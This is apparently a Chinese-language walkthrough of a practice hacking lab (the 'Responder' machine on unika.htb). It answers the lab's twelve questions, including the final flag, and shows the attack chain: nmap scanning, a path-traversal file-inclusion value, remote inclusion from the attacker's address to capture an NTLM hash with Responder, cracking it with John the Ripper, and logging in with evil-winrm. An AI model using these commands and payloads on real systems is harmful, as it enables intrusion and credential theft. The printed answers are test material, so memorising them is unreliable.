打开靶机,看第一个问题:
问:机器上跑了几个tcp端口?
回答:3个,才开始使用默认扫描方式只扫出来一个80,后来指定了端口返回,扫出来三个端口,分别是80、5985、7680,使用如下命令扫描
nmap -v -A -p1-65535 10.129.212.141
第二个问题:
问:当使用IP进行访问时,被重定向去了哪里?
回答:unika.htb
第三个问题:
问:网页是使用哪种脚本语言写的?
回答:php。
首先在burpsuite中进行抓包,然后对回包进行截取
然后能看到网页是用php写的
关于页面跳转的一个技巧
可以修改hosts文件禁止这种跳转,以kali为例,首先编辑/etc/hosts文件,添加一下IP地址和跳转的地址
然后访问,有页面了:
第四个问题:
问:用于加载不同语言版本网页的 URL 参数的名称是什么?
回答:page,我是猜的,因为第五题有个单词是page。其实点击上面出现的页面右上角的EN就能发现
看第五题:
问:下面哪个选项可以作为page的参数来进行本地文件包含。
回答:…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts。这很明显,这就是个选择题。
第六个问题:
问:远程文件包含是下面哪种类型
回答://10.10.14.6/somefile。选择题
第七个问题:
问:NTLM全称是什么?
回答:New Technology LAN Manager
第八个问题:
问:responder中的哪个参数能指定网络接口?
回答:-I。参考:https://blog.csdn.net/weixin_43221560/article/details/107757138
第九个问题:
问:john的全称是什么?
回答:john the ripper。可以用来破解NTLM的哈希的。
第十个问题:
问:administrator用户的密码是什么?
回答:badminton
首先启动responder并监听本地的tun0网卡,然后由于靶机存在RFI,因此可以远程访问本地的某个文件,使用responder拿到主机的administrator的哈希,然后使用john破解
使用responder监听本地tun0网卡
responder -I tun0
靶机的地址访问本地的地址,注意访问的是本地的地址,就是openvpn获取到的地址。
responder获取到了哈希
保存到本地,使用john破解(时间非常久)
第十一个问题:
问:我们将使用 Windows 服务(即在box上运行)使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?
回答:5985
第十二个问题:
问:flag是啥
回答:ea81b7afddd03efaa0945333ed147fac
直接使用evil-winrm连接
evil-wimrm -i 10.129.212.141 -u Administrator -p badminton
找到位于mike账户desktop下面的flag.txt
参考:
https://www.(油管你懂得,记得替换).com/watch?v=R8GOLiKIA1k
https://blog.csdn.net/w1304099880/article/details/106843786/